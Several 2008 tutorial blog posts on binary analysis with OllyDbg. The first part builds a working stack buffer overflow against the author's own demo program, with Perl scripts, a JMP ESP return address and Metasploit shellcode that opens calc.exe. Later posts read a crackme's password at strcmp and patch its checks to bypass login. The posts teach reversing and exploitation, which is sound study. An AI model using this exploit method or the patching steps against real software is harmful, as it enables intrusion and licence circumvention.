004012E8   |.  E8 482E0000       CALL overflow.00404135
004012ED   |.  83C4 08           ADD ESP,8
004012F0   |.  5F                POP EDI                     ;overflow.00401330
004012F1   |.  C9                LEAVE
004012F2   \.  C3                RETN

If you pay close attention to the stack at this point, you’ll notice that as the function is called, the address of the instruction immediately after the CALL command is pushed onto the stack (in our case 00401330). This is called the return address and it is what the program will use to return to the main part of the program after calling the function.

onto the function:

The first thing that most functions do is called the “prolog”. It pushes EBP onto the stack and moves ESP into EBP. Generally this means that all function parameters will be referred to as EBP+X and all local variables will be referred to as EBP-X. The function then allocates the space required for local variables by moving the stack pointer the appropriate number of bytes (100 in hex = 256 bytes, the size of our name variable).

The CALL line at 004012E8 is our strcpy function.

Stepping into this section, you can see that it prepares itself for the place where it copies the input string:

00404152   |.  F3:A4             REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]

This (as we found out in the binary analysis part II blog) uses the register ECX as a counter and increments EDI and ESI after each byte. at this point you can see that the ECX register is 6, which is our “Hello” string plus room for a null character on the end, and we can now see that our string has been copied onto the stack:
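In C terms, the REP MOVS instruction behaves roughly like the loop below when the direction flag is clear. This is only a sketch to make the register roles concrete; rep_movsb and movs_count are made-up names, with the parameters named after the registers they stand in for.

```c
#include <stddef.h>
#include <string.h>

/* Copy ecx bytes from esi to edi, one byte per iteration, advancing both
   pointers and counting ecx down to zero (direction flag assumed clear).
   Returns the number of bytes copied. rep_movsb is a hypothetical name. */
size_t rep_movsb(unsigned char *edi, const unsigned char *esi, size_t ecx)
{
    size_t copied = 0;

    while (ecx != 0)
    {
        *edi++ = *esi++;
        ecx--;
        copied++;
    }
    return copied;
}

/* The count set up for a string copy: the characters plus the null byte. */
size_t movs_count(const char *s)
{
    return strlen(s) + 1;
}
```

For "Hello", movs_count returns 6, matching the ECX value seen in the debugger.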

0012FD88   6C6C6548  Hell
0012FD8C   8A43006F  o.CŠ

finishing up, the function does everything in reverse – pops EDI and then executes the LEAVE command, which does the opposite of the prolog. it is equivalent to the two instructions below: the MOV throws away the local variables (undoing the SUB ESP,100) and the POP restores the caller’s EBP:

MOV ESP,EBP
POP EBP

At this point, you’ll notice that the address at the top of the stack is the return address that we mentioned previously, pointing to 00401330, the instruction immediately after the call to the function:


0012FE8C   00401330  0@.  RETURN to overflow.00401330 from overflow.004012D4

We hit f8 again and the EIP now contains 00401330 and we’ve returned to the calling block.

But there is absolutely nothing stopping us passing in 256 or more characters and causing strcpy() to faithfully copy whatever we tell it to into the name array (plus a terminating null byte), despite the fact the program only allocates 256 bytes.
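Strictly speaking the trouble starts at 256 characters, because strcpy also writes the terminating null byte. A small sketch of that arithmetic, plus a version of copyme that refuses oversized input (the function names are illustrative, and the checked variant is only there for contrast, not as a fix to the demo program):

```c
#include <stddef.h>
#include <string.h>

/* strcpy writes the string plus its terminating null byte. */
size_t bytes_written_by_strcpy(size_t input_len)
{
    return input_len + 1;
}

/* Returns 1 if copying a string of input_len characters would write
   past a buffer of buf_size bytes. */
int would_overflow(size_t input_len, size_t buf_size)
{
    return bytes_written_by_strcpy(input_len) > buf_size;
}

/* copyme with a length check: returns 0 on success, -1 if rejected.
   copyme_checked is a hypothetical variant for illustration. */
int copyme_checked(const char *input)
{
    char name[256];

    if (would_overflow(strlen(input), sizeof name))
        return -1;
    strcpy(name, input);
    return 0;
}
```

With a 256-byte buffer, 255 characters fit and 256 do not; 300 characters means 301 bytes written.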

Let’s try it:

#!/usr/local/bin/perl
$buffer = "A"x300;

exec "c:\\stuff\\tools\\odbg110\\ollydbg ./overflowme.exe \"$buffer\"";

If we run this perl script and step through the program again – we’ll come to the REP MOVS copy command again and will note that the ECX register is set to 12D (or 301 bytes), which is the length of our input plus one for a null byte at the end.

So we know that this will write past the allocated space of 256 bytes – it causes our buffer to look like this:

0012FD84   00144C48  HL.
0012FD88   41414141  AAAA
0012FD8C   41414141  AAAA
0012FD90   41414141  AAAA
0012FD94   41414141  AAAA
0012FD98   41414141  AAAA
0012FD9C   41414141  AAAA
..
..
0012FE88   41414141  AAAA
0012FE8C   41414141  AAAA
0012FE90   41414141  AAAA
0012FE94   41414141  AAAA
etc.

and as we continue to step through – we get to the RETN command and find that our return address has been overwritten by “41414141”! we step again and we get an error:

and if we pass the error to the program (shift+f9) we get:


A segmentation fault (an access violation, in Windows terms)! this means that the application tried to execute a bit of memory that it did not have permission to access. (this is a feature of modern processors running in Protected mode http://en.wikipedia.org/wiki/Protected_mode).

What we realise here is that the processor was trying to execute instructions contained at the address 41414141, an address that the user passed to it!

What if, instead of sending through a bunch of A’s, we could send through our own code, then cause the program to start executing it by pointing the return address into our code? we could then cause the program to do whatever we wanted it to!

So the first thing to do is identify exactly which part of our input string overwrites the return address. mostly we do this by a series of educated guesses. We know that the allocated buffer is 256 bytes long and we know that at the point the program subtracts the allocated space from the stack pointer, the stack looks like this:

0012FE88  /0012FF70  pÿ.
0012FE8C  |00401330  0@.  RETURN to overflow.00401330 from overflow.004012D4
0012FE90  |00144B55  UK.  ASCII "Hello"
0012FE94  |7C910208  ‘|  ntdll.7C910208

that is, it will always have the previous stack frame pointer pushed on top of the return address – so we can take a guess that to overwrite the return address exactly, we’ll need 256 A’s to fill the buffer, 4 more to fill the space where ebp was pushed and then we can overwrite the return address.

so here’s our attempted perl script:

#!/usr/local/bin/perl
$buffer = "A"x256;  #fills up the variable space
$buffer .= "A"x4;    #should overwrite the saved ebp
$buffer .= "B"x4;    #should overwrite the return address with 42424242
$buffer .= "C"x100;  #if return address = 43434343 then we've padded too little

exec "c:\\stuff\\tools\\odbg110\\ollydbg ./overflowme.exe \"$buffer\"";

and it turns out:


It’s exactly where we expected it to be! now if the allocated space was not a multiple of 4, the compiler may round it up, and we would possibly have to compensate by between 1 and 3 bytes to get it exactly spot on, but in this case we don’t need to worry about it.

if we have a quick look at the process in Olly – we’ll see the stack looks something like this:

0012FE84   41414141  AAAA
0012FE88   41414141  AAAA
0012FE8C   42424242  BBBB  ;this is our return address
0012FE90   43434343  CCCC
0012FE94   43434343  CCCC

So now we know we can overwrite the return address at will, and by doing so can cause the program to execute whatever code is at the address we point to.

So, we just need to point it to the address 0012FE90, right? That way we can pass in some instructions instead of a whole bunch of C’s and the computer will execute them? Yes, but the problem we face here is that this address contains a null byte (the 00). When strcpy() encounters a null byte it stops copying, meaning that although we can change the return address all right, none of the code following it would be copied.

In this particular program, there are two solutions to this:

We can place our code before the return address (this is only possible if the allocated space is large enough for our code, which is not always the case), or we can take note of the fact that as soon as the program flow goes to the return address, the ESP register will be pointing at the top of the stack, where our C’s start. So what we need to do is find a memory address which does not have any null bytes in it and which holds the instruction JMP ESP or CALL ESP. We then replace the return address with this address and the program will start executing our user input.

This is where OllyUni comes in. OllyUni is an add-on to OllyDbg that allows searching for certain instructions in all the memory executable by the current process. Just google for it and place the .dll file in your Olly directory.

Once you’ve got OllyUni in, restart OllyDbg and right-click in the execution window -> overflow return address -> ASCII overflow returns -> JMP/CALL ESP. Depending on the speed of your computer this may take a while.

It should come back in time with a message saying it’s found some addresses:

Awesome! View -> Log

Pick an address that does not have 00 in it. For our purposes, we’re going for “7C86467B”.

Now we place that in our Perl script:

#!/usr/local/bin/perl
$buffer = "A"x256;  #fills up the variable space
$buffer .= "A"x4;   #should overwrite the ebp address
$buffer .= "\x7B\x46\x86\x7C";   #should overwrite the return address with 7C86467B
$buffer .= "C"x100;  #placeholder bytes that ESP will point at after the return

exec "c:\\stuff\\tools\\odbg110\\ollydbg ./overflowme.exe \"$buffer\"";

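Note that the address bytes are written “backwards”. This is because x86 is little-endian: the least significant byte of a value is stored at the lowest address, so the bytes have to appear in our string in reverse order.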

Now run it just for kicks…

Our stack, as expected, looks like this:

0012FE84   41414141  AAAA
0012FE88   41414141  AAAA
0012FE8C   7C86467B  {F†|  kernel32.7C86467B
0012FE90   43434343  CCCC
0012FE94   43434343  CCCC

Step through the RETN command…

and we find execution has landed at:

7C86467B   - FFE4               JMP ESP

and then, one step later, our EIP register of course looks like this:

EIP 0012FE90

demonstrating that we’re about to execute our C’s.

Now we step again and we find our useless-fact-of-the-day: the byte “43” in hex is the opcode for INC EBX, as we see that the program is trying to execute the instructions:

Execution window:

0012FE90     43             INC EBX
0012FE91     43             INC EBX
0012FE92     43             INC EBX
0012FE93     43             INC EBX
0012FE94     43             INC EBX
0012FE95     43             INC EBX
0012FE96     43             INC EBX
0012FE97     43             INC EBX

Stack window:

0012FE90   43434343  CCCC
0012FE94   43434343  CCCC

yay for us!

Now let’s do something a bit more useful than incrementing EBX a hundred times, eh?

How about we open the calculator program calc.exe?

Head on over to metasploit.com, choose shellcode, click demonstration version, filter modules to os::win32, pick “Windows Execute Command”, type “calc.exe” into the CMD field and hit the “generate payload” button.

Copy and paste the shellcode into your Perl script like so, removing the C’s and adding $shellcode to the command line arguments:

#!/usr/local/bin/perl
$buffer = "A"x256;  #fills up the variable space
$buffer .= "A"x4;   #should overwrite the ebp address
$buffer .= "\x7B\x46\x86\x7C";   #should overwrite the return address with 7C86467B
$shellcode =
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe2".
"\x61\xf1\x91\x83\xeb\xfc\xe2\xf4\x1e\x89\xb5\x91\xe2\x61\x7a\xd4".
"\xde\xea\x8d\x94\x9a\x60\x1e\x1a\xad\x79\x7a\xce\xc2\x60\x1a\xd8".
"\x69\x55\x7a\x90\x0c\x50\x31\x08\x4e\xe5\x31\xe5\xe5\xa0\x3b\x9c".
"\xe3\xa3\x1a\x65\xd9\x35\xd5\x95\x97\x84\x7a\xce\xc6\x60\x1a\xf7".
"\x69\x6d\xba\x1a\xbd\x7d\xf0\x7a\x69\x7d\x7a\x90\x09\xe8\xad\xb5".
"\xe6\xa2\xc0\x51\x86\xea\xb1\xa1\x67\xa1\x89\x9d\x69\x21\xfd\x1a".
"\x92\x7d\x5c\x1a\x8a\x69\x1a\x98\x69\xe1\x41\x91\xe2\x61\x7a\xf9".
"\xde\x3e\xc0\x67\x82\x37\x78\x69\x61\xa1\x8a\xc1\x8a\x91\x7b\x95".
"\xbd\x09\x69\x6f\x68\x6f\xa6\x6e\x05\x02\x90\xfd\x81\x4f\x94\xe9".
"\x87\x61\xf1\x91";

exec "c:\\stuff\\tools\\odbg110\\ollydbg ./overflowme.exe \"$buffer$shellcode\"";

Breaking down this bit of code is something for another day; suffice to say that it goes and opens the calculator. It is called shellcode because usually you would use it to open a shell. I think it was Aleph1 who coined the phrase in his Phrack article “Smashing the Stack for Fun and Profit”.

Now we’re almost ready. You’ll notice that when running through the above, it still fails miserably…

Here is where I admit my lack of patience to find out why. I know it fails because the registers contain the wrong values, but I don’t know why adding 7 NOPs before the start of the shellcode fixes it. Anyway, I’ll come back to that I guess.

So our final script is as follows:

#!/usr/local/bin/perl
$buffer = "A"x256;  #fills up the variable space
$buffer .= "A"x4;   #should overwrite the ebp address
$buffer .= "\x7B\x46\x86\x7C";   #should overwrite the return address with 7C86467B
$buffer .= "\x90"x7;   #7 NOPs ahead of the shellcode
$shellcode =
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe2".
"\x61\xf1\x91\x83\xeb\xfc\xe2\xf4\x1e\x89\xb5\x91\xe2\x61\x7a\xd4".
"\xde\xea\x8d\x94\x9a\x60\x1e\x1a\xad\x79\x7a\xce\xc2\x60\x1a\xd8".
"\x69\x55\x7a\x90\x0c\x50\x31\x08\x4e\xe5\x31\xe5\xe5\xa0\x3b\x9c".
"\xe3\xa3\x1a\x65\xd9\x35\xd5\x95\x97\x84\x7a\xce\xc6\x60\x1a\xf7".
"\x69\x6d\xba\x1a\xbd\x7d\xf0\x7a\x69\x7d\x7a\x90\x09\xe8\xad\xb5".
"\xe6\xa2\xc0\x51\x86\xea\xb1\xa1\x67\xa1\x89\x9d\x69\x21\xfd\x1a".
"\x92\x7d\x5c\x1a\x8a\x69\x1a\x98\x69\xe1\x41\x91\xe2\x61\x7a\xf9".
"\xde\x3e\xc0\x67\x82\x37\x78\x69\x61\xa1\x8a\xc1\x8a\x91\x7b\x95".
"\xbd\x09\x69\x6f\x68\x6f\xa6\x6e\x05\x02\x90\xfd\x81\x4f\x94\xe9".
"\x87\x61\xf1\x91";

exec "./overflowme.exe \"$buffer$shellcode\"";

You can remove the Olly call as I have done above and execute!

We should be rewarded with the calculator opening, and a terminal message stating that we have abnormal program termination.

And we can now do a root dance in celebration.

Next blog we’ll look at what happens when we remove that hard-coded array, reducing the space on the stack, and how we can insert our shellcode before the return address.

There is also a follow-up to the article mentioned at the top of this post, here: http://www.ethicalhacker.net/content/view/165/2/ which also goes into basic buffer overflows.

Until next time.

Posted by: nickfnord | October 2, 2008

Binary Analysis Basics Part III

Hello again,

This is yet another session reversing simple C programs in order to see how they work under the hood.

For this session, we’ll need the same tools as before:

A C compiler for windows (I’m using LCC: http://www.cs.virginia.edu/~lcc-win32/)
Ollydbg (http://www.ollydbg.de/)
IDA demo or free (http://www.datarescue.be/downloaddemo.htm)
A good text editor, or you can use the IDE which comes with LCC.
Knowledge of basic programming structure.
Basic knowledge of assembly language.
Some familiarity with OllyDbg
Knowledge of hex

This time, the hello world program will be a bit more complex. There are a number of things I would like to demonstrate here.

1. This program is essentially a crackme. It’s a very basic one, but there are three different “levels” (for want of a better word), the first of them in two parts, that we will go through when demonstrating how to crack it. These are:
Level1a: Identify the password string for a particular login name (super easy)
Level1b: Bypass the authentication checking section by patching (easy (and cheating))
Level2: Create a keygen without understanding the algorithm (a bit harder)
Level3: Understand the algorithm just by looking at the source (more difficult but instructive)
2. This is still a simple trial program, but as you’ll see, things just got a whole lot more complicated. The point of reversing is not always to understand the entire thing, and in most cases you can’t because of the size of the program. We just need to find what we’re looking for and understand a bit of how the program flows.
3. There are two constructs here that were deliberately left out of the previous two examples: loops and functions.
4. In the process of doing the above, we’ll learn a bit more of the functionality of OllyDbg and IDA Pro.

The approach we will take is that of an analyst looking at how we can achieve the three levels mentioned above, and as we do, points 2, 3 and 4 will be fully explored. Also note that bypassing a login and gleaning the plain text password as easily as we will do is very unlikely to be possible on a commercial product or on the harder crackmes that you’ll find around the place. The purpose of this is just to learn what is possible.

Obviously we have the complete source code available to us for viewing, which we wouldn’t normally have when trying a crackme, but this is a learning exercise.

Now one thing I want to make clear here: I do not condone bypassing the protection of commercial software just for the sake of using it without paying for it, regardless of whether it is legal or not in whatever country you are in. The reason we are going through this “crackme” here is to demonstrate binary analysis, with the ultimate goal being complete understanding of the program.

So here’s the Code:

#include <stdio.h>
#include <string.h>
#include <ctype.h>

void keygen(char p[],char c[])
{
int i,j;
char key[] = "NICKFNORD";
//generate password C=p+k(mod26) and check
for(i=0,j=0;i<strlen(p);i++,j++)
{
if(j>=strlen(key))
{
j=0;
}
c[i] = ((toupper(p[i])-65+key[(j)]-65)%26+65);

}
}

int main(void)
{
char username[50];
char password[50];
char correctp[50];
int i,j;

for (i=0;i<50;i++)
{
correctp[i] = '\0';
password[i] = '\0';
//username[i] = '\0';
}

printf("Enter Username:\n");
scanf("%s",username);
printf("Enter Password:\n");
scanf("%s",password);
//find length of username/password, each must be at least 8 characters
if (strlen(username) < 8 | strlen(password) < 8)
{
printf("invalid username/password combination");
return 1;
}

keygen(username,correctp);

if (strcmp(correctp,password)==0)
{
printf("Hello World!\nThank you for logging in %s",username);
}
else
{
printf("invalid username/password combination");
}
return 0;
}

This time, we find that the disassembly is slightly different: our program is bigger and so there is more to scroll through to get to the bits that we’re interested in. Instead of just a walkthrough of the code this time around, we’re going to treat this like a crackme and pretend that we haven’t seen the source code above.

So the first thing one would normally do is to run the program to see what we have:

C:\stuff\C>compile hello4

C:\stuff\C>lcc -o hello4.obj hello4.c

C:\stuff\C>lcclnk -o hello4.exe hello4.obj

C:\stuff\C>hello4
Enter Username:
ZZZZZZZZ
Enter Password:
AAAAAAAA
invalid username/password combination
C:\stuff\C>

What we are trying to do in the first instance is identify parts of the program that we can search for, in order to find where the protection starts.

So we open it up in Olly. You’ll notice that although this is still a fairly simple program, there is a bit more complexity. Olly has done its best to analyse the code and place brackets around significant blocks, but it isn’t clear where any of the messages above come from. Most crackmes would also have a GUI, which adds even more complexity to the disassembly, so the easiest way to find your place in a program like this is to search for text strings.

Right click in the main program window -> search for -> all referenced text strings

You’ll see a short list of hard-coded strings that appear in the program:

Seeing as our first goal is to bypass the username/password code and get straight to whatever is behind it, we are most interested in what happens after we enter our username and password. We notice that there are two lines that display our error message. We can infer from this that there are multiple separate validations occurring that may trigger the error, and we do not know which one we have triggered. There are a number of ways forward from here: we can ignore the fact that we don’t know which check we have triggered and just see what the last one does and try to bypass that, or we can trace through from the start of the program to see what happens immediately after it requests our username/password. For the moment, though, there is a glaringly obvious place to start: the line that says “Hello World!Thank you for logging in %s”. This is what we want to achieve, so let’s start there and work backwards. Double click on that line in the strings window and Olly will take you to the portion of code referencing that string.

00401465  |. 83F8 00        CMP EAX,0
00401468  |. 75 16          JNZ SHORT hello4.00401480
0040146A  |. 8DBD 66FFFFFF  LEA EDI,DWORD PTR SS:[EBP-9A]
00401470  |. 57             PUSH EDI                         ; /<%s>
00401471  |. 68 AAB04000    PUSH hello4.0040B0AA             ; |format = "Hello World!Thank you for logging in %s"
00401476  |. E8 A2760000    CALL hello4._printf              ; \_printf
0040147B  |. 83C4 08        ADD ESP,8
0040147E  |. EB 0D          JMP SHORT hello4.0040148D
00401480  |> 68 D3B04000    PUSH hello4.0040B0D3             ; /format = "invalid username/password combination"
00401485  |. E8 93760000    CALL hello4._printf              ; \_printf
0040148A  |. 83C4 04        ADD ESP,4
0040148D  |> B8 00000000    MOV EAX,0

Now we should recognise this construct immediately:

CMP command (or any command that sets the appropriate flags)
Conditional Jump (to start of code block 2)
Code block 1
Unconditional Jump(to line after end of code block 2)
Code block 2

This is an if-test type construct as we have previously seen.

We assume that the program will take our username, generate a correct password from it and compare that one with the one that we entered. The first place to look for this is immediately before the successful login and failure messages. In this instance, we can very clearly see that there is a call to strcmp just before the compare command that feeds the conditional jump we have been looking at:

00401455  |. 8D7D CA        LEA EDI,DWORD PTR SS:[EBP-36]
00401458  |. 57             PUSH EDI                         ; /s2
00401459  |. 8D7D 98        LEA EDI,DWORD PTR SS:[EBP-68]    ; |
0040145C  |. 57             PUSH EDI                         ; |s1
0040145D  |. E8 AE790000    CALL <JMP.&CRTDLL.strcmp>        ; \strcmp

We can see that it loads the addresses of two variables stored on the stack and pushes them onto the top of the stack before calling the strcmp function. We can therefore assume that these two strings are going to be our password and the password generated by the program. The easiest way to check is to set a breakpoint (F2) on line 0040145D and see what the situation is.

Run the program (F9) after setting the breakpoint and we can see that the top two lines of the stack are as below:

0012FEBC   0012FF08  |s1 = "MHBJEMNQ"
0012FEC0   0012FF3A  \s2 = "AAAAAAAA"

So let’s give it a try:

C:\stuff\C>hello4
Enter Username:
ZZZZZZZZ
Enter Password:
MHBJEMNQ
Hello World!
Thank you for logging in ZZZZZZZZ
C:\stuff\C>

… and we see the magic words.

Now at this point it is also trivial to bypass the above if-test entirely. OllyDbg allows us to make changes to this code and save our changes into another executable. We basically want to remove this if-test, allowing us to get to the Hello World message regardless of what we put in the username and password fields. To do this, we can do any number of things to stop the code from jumping. The simplest is to fill the instruction with NOPs (no-operation instructions).

Click on the JNZ line (00401468) and right click -> binary -> fill with NOPs

You should now see this:

00401465  |. 83F8 00        CMP EAX,0
00401468     90             NOP
00401469     90             NOP
0040146A  |. 8DBD 66FFFFFF  LEA EDI,DWORD PTR SS:[EBP-9A]

Now there is one more thing that we should take care of before writing this to another binary file. If you scroll up, you’ll see the other “invalid username/password combination” string. Because we don’t know which one we encountered when we ran through the program, we should take this out as well. The assembly surrounding it is as follows:

00401429  |. 83FF 00        CMP EDI,0
0040142C  |. 74 14          JE SHORT hello4.00401442
0040142E  |. 68 D3B04000    PUSH hello4.0040B0D3             ; /format = "invalid username/password combination"
00401433  |. E8 E5760000    CALL hello4._printf              ; \_printf
00401438  |. 83C4 04        ADD ESP,4
0040143B  |. B8 01000000    MOV EAX,1
00401440  |. EB 50          JMP SHORT hello4.00401492
00401442  |> 8D7D 98        LEA EDI,DWORD PTR SS:[EBP-68]

This looks similar to our standard if-then-else test, except this time the second (unconditional) jump goes a very long way away. If we follow it down, we’ll see that line 00401492 finalises the program and returns to the calling block. What this looks like is an if-test without an else. So in pseudo code we can assume that the programmer has written something like:

if EDI <> 0 then
print invalid message
exit program
end if;

In any case, because all we want to do here is bypass the invalid message and stop the program from exiting, we simply need to turn that conditional JE into an unconditional JMP. Once again: right click -> assemble.

Change the text to

JMP SHORT 00401442

and assemble.

It should now look like this:

0040142C     EB 14          JMP SHORT hello4.00401442

We are now ready to save our changes into a separate executable.

Right-click in the disassembly window -> copy to executable -> all modifications -> “copy all”.
This will bring up another window with our modified disassembly. Right click -> Save file. Change the name to something else. In this case I’m calling it Hello4patched.exe

Now let’s run it and see how it works:

C:\stuff\C>hello4patched.exe
Enter Username:
AAAAAAAA
Enter Password:
ZZZZZZZZ
Hello World!
Thank you for logging in AAAAAAAA

C:\stuff\C>hello4patched.exe
Enter Username:
asdf
Enter Password:
asdf
Hello World!
Thank you for logging in asdf
C:\stuff\C>

Well, hey! There we go. Now that was easy, wasn’t it? With a bare minimum of understanding of the program’s workings we managed to bypass the two sections of security, and heck, we didn’t even figure out what either of them actually did.

Now on a very serious note: what I just demonstrated was absolute rubbish:

We didn’t learn anything whatsoever about the program
We still haven’t figured out what algorithm is used to generate the passwords
There is only a minuscule chance that any actual commercial product will allow us to simply bypass an if-test or two in order to get to the main program.
We didn’t actually achieve anything useful whatsoever in relation to learning how to reverse, with the exception of learning how to patch executables using OllyDbg.

The goal here is to be able to understand common constructs and to be able to find what we’re looking for in the disassembly as fast as possible.

There are quite a few things we need to analyse and find out:

What is that first lot of validation that seems to happen before comparing the strings?
What do the few lines of code before the enter username line do?
What algorithm is used to determine the password?
Can we possibly duplicate this algorithm in a program of our own?

We’ll deal with these in the next blog, where we go on to deconstructing loops and looking at Level 2 of the goals mentioned at the start of this blog.

until then.

Nick.

I have to say that I really had to force myself to work through the above so that I could understand it well enough to write it down and explain it all to someone else. The reason is that IDA Pro is seriously better at giving the reverser a good overview of a program’s flow.

As I was going through the above, I sometimes referenced IDA Pro, but I made myself understand what was going on in Olly just to exercise my brain. After all, I’m not here to crack my own hello world program, I’m here to learn stuff.

Posted by: nickfnord | October 1, 2008

Binary Analysis Basics Part II

In the previous blog, we broke down a couple of simple C programs that we compiled and disassembled, analysing how constructs such as if-then-else and basic comparisons look when disassembled. In this one we do the same thing with another fundamental construct: arrays.

You will need:

A C compiler for windows (I’m using LCC: http://www.cs.virginia.edu/~lcc-win32/)
Ollydbg (http://www.ollydbg.de/)
IDA demo or free (http://www.datarescue.be/downloaddemo.htm)
A good text editor, or you can use the IDE which comes with LCC.
Knowledge of basic programming structure (you don’t have to know C as I’ll explain the relevant bits).
Basic knowledge of assembly language (just have a read through PCASM first and keep it as a reference).
Some familiarity with OllyDbg
Knowledge of hex

The following C code adds a few more complexities that are essential to understand when reversing.

#include <stdio.h>
#include <string.h>
int main(void)
{
char name[20];
char rname[] = "NickFnord";

printf("Enter Name:\n");
scanf("%s",name);

printf("\nThe Array of characters that you entered was: %s\n",name);
printf("Name array starts at: %d\n",name);
printf("first char of array has ascii value of: %d\n",name[0]);

if (strcmp(name, rname) == 0)
{
printf("Hello World\n");
}
else
{
printf("No Greeting for you\n");
}

return 0;
}

The first important thing to understand, if you’re new to programming or have only worked in higher level languages, is that strings, such as the two declared above, are actually stored as arrays of characters. The second thing to note is that we cannot do a direct comparison of the entire string. Because it is effectively not a string but an array of characters, we must either compare each character individually or call a function which does the same. So we have included the string.h header in order to have access to the strcmp function. Also note that when you are running this program, the scanf function will only read the first word you type, i.e. it will stop reading your input when it finds white space. We could use the “gets” function in order to capture multiple words, but we’ll look at that next time.

First, before opening Olly, run the program to see what it outputs.

c:\stuff\C>hello3
Enter Name:
NickFnord

The Array of characters that you entered was NickFnord
Name array starts at: 1245020
first char of array has ascii value of: 78
Hello World

c:\stuff\C>hello3

So let’s take a look under the hood.

004012D4  /$ 55             PUSH EBP
004012D5  |. 89E5           MOV EBP,ESP
004012D7  |. 83EC 20        SUB ESP,20
004012DA  |. 56             PUSH ESI
004012DB  |. 57             PUSH EDI
004012DC  |. 8D7D E2        LEA EDI,DWORD PTR SS:[EBP-1E]
004012DF  |. 8D35 A0B04000  LEA ESI,DWORD PTR DS:[40B0A0]
004012E5  |. B9 0A000000    MOV ECX,0A
004012EA  |. F3:A4          REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]

At line 004012DC we can see that the stack address EBP-1E is loaded into EDI. Your mileage may vary, but for me EBP is 0012FF70, and so EDI will be 0012FF52 after that command has been run. This is half-way between two entries on the stack displayed by Olly and, as we will find out later, this is where the variable declared at the beginning of the program, containing “NickFnord”, will be stored.

You’ll notice that at the second LEA on line 004012DF, the program has taken the memory address of the constant “NickFnord” and placed it in the ESI register. You can follow it in the dump to see it along with the other constants that have been stored in the program’s data segment. The command “MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]” copies the byte at the address stored in ESI to the address stored in EDI, but the REP prefix in front causes this command to be repeated, using the ECX register as a counter and incrementing EDI and ESI each time around. As the ECX register was set to 0A (or 10 in decimal) in the previous command, we know that it will repeat the MOVS command 10 times, moving along the dump one byte each time, and therefore take 10 bytes starting from the memory address stored in ESI (0040B0A0) and place them in turn on the stack, which will now look something like this:

0012FF50   694E1EE0  àNi
0012FF54   6E466B63  ckFn
0012FF58   0064726F  ord.
0012FF5C   0012FF70  pÿ.
0012FF60   0012FF6C  lÿ.
0012FF64   7C910208  ‘|  ntdll.7C910208

The next bit is nothing too complicated:

004012EC  |. 68 48B14000    PUSH hello3.0040B148             ; /format = "Enter Name:"
004012F1  |. E8 8B760000    CALL hello3._printf              ; \_printf
004012F6  |. 83C4 04        ADD ESP,4
004012F9  |. 8D7D EC        LEA EDI,DWORD PTR SS:[EBP-14]
004012FC  |. 57             PUSH EDI

This prints out the string stored at 0040B148 and then uses the LEA command to prepare the way for the user’s input. We’ll notice that the address referred to by EBP-14 is 0012FF5C, which is immediately after the space that was used to store the variable containing NickFnord. This is where our input string will be stored. As this address is now held in the EDI register and pushed onto the stack, we can guess that the scanf function below will write its output to the address that EDI points to.

004012FD  |. 68 45B14000    PUSH hello3.0040B145             ; /format = "%s"
00401302  |. E8 A1430000    CALL hello3._scanf               ; \_scanf
00401307  |. 83C4 08        ADD ESP,8
0040130A  |. 8D7D EC        LEA EDI,DWORD PTR SS:[EBP-14]
0040130D  |. 57             PUSH EDI                         ; /<%s>
0040130E  |. 68 12B14000    PUSH hello3.0040B112             ; |format = "The Array of characters that you entered was: %s"
00401313  |. E8 69760000    CALL hello3._printf              ; \_printf
00401318  |. 83C4 08        ADD ESP,8

When running through this time, I have put “ZZZZZZZZZZ” into the input value to make it a bit easier to distinguish between this value and the constant NickFnord declared earlier. After this section of code, our stack should look like this:

0012FF50   694E1EE0  àNi
0012FF54   6E466B63  ckFn
0012FF58   0064726F  ord.
0012FF5C   5A5A5A5A  ZZZZ
0012FF60   5A5A5A5A  ZZZZ
0012FF64   7C005A5A  ZZ.|

So the scanf function takes the input value, inserts it into the allocated memory space and appends a null terminator. You can see that the constant “NickFnord” is also followed by a null character. This fact becomes significant later on when we look at buffer overflows. What happens if we put in more than the allocated 20 characters? What happens if we overwrite the return address stored at 0012FF74 and cause it to point elsewhere? Our program should really validate the length of the user’s input before copying it into memory. More on that another time though.

Next bit then:

0040131B  |. 8D7D EC        LEA EDI,DWORD PTR SS:[EBP-14]
0040131E  |. 57             PUSH EDI                         ; /<%d>
0040131F  |. 68 F8B04000    PUSH hello3.0040B0F8             ; |format = "Name array starts at: %d"
00401324  |. E8 58760000    CALL hello3._printf              ; \_printf
00401329  |. 83C4 08        ADD ESP,8
0040132C  |. 0FBE7D EC      MOVSX EDI,BYTE PTR SS:[EBP-14]
00401330  |. 57             PUSH EDI                         ; /<%d>
00401331  |. 68 CCB04000    PUSH hello3.0040B0CC             ; |format = "first char of array has ascii value of: %d"
00401336  |. E8 46760000    CALL hello3._printf              ; \_printf
0040133B  |. 83C4 08        ADD ESP,8

You’ll notice that in this section the LEA command again references the start of the user-entered array. This is redundant, as this address has already been loaded into EDI. However, you’ll notice the MOVSX command is also referencing the same location in memory, just that this time it is reading the byte stored there (and sign-extending it to 32 bits) rather than loading the effective address, and so we know from the above section of the stack that it will return to the user the value 5A, or 90 in decimal, which is the ASCII value for “Z”.

0040133E  |. 8D7D E2        LEA EDI,DWORD PTR SS:[EBP-1E]
00401341  |. 57             PUSH EDI                         ; /s2
00401342  |. 8D7D EC        LEA EDI,DWORD PTR SS:[EBP-14]    ; |
00401345  |. 57             PUSH EDI                         ; |s1
00401346  |. E8 29790000    CALL <JMP.&CRTDLL.strcmp>        ; \strcmp
0040134B  |. 83C4 08        ADD ESP,8
0040134E  |. 83F8 00        CMP EAX,0
00401351  |. 75 0F          JNZ SHORT hello3.00401362

This section prepares the data “NickFnord” and the data that we entered by loading their addresses into EDI and then pushing them one after another onto the stack. You’ll notice something very handy about Olly in that it performs some of the calculations for you in the bit under the program window, so when EIP is pointing at 0040133E for example (i.e. about to execute this line) you will notice that Olly tells you the stack address being referred to by EBP-1E and the null-terminated array stored at that address, as well as the current value of EDI:

Stack address=0012FF52, (ASCII "NickFnord")
EDI=0000005A

This makes debugging a whole lot quicker as you don’t have to manually calculate addresses if you want to know what part of the stack to watch.

At the second LEA command your window should display:

Stack address=0012FF5C, (ASCII "ZZZZZZZZZZZZZZZZZZZZ")
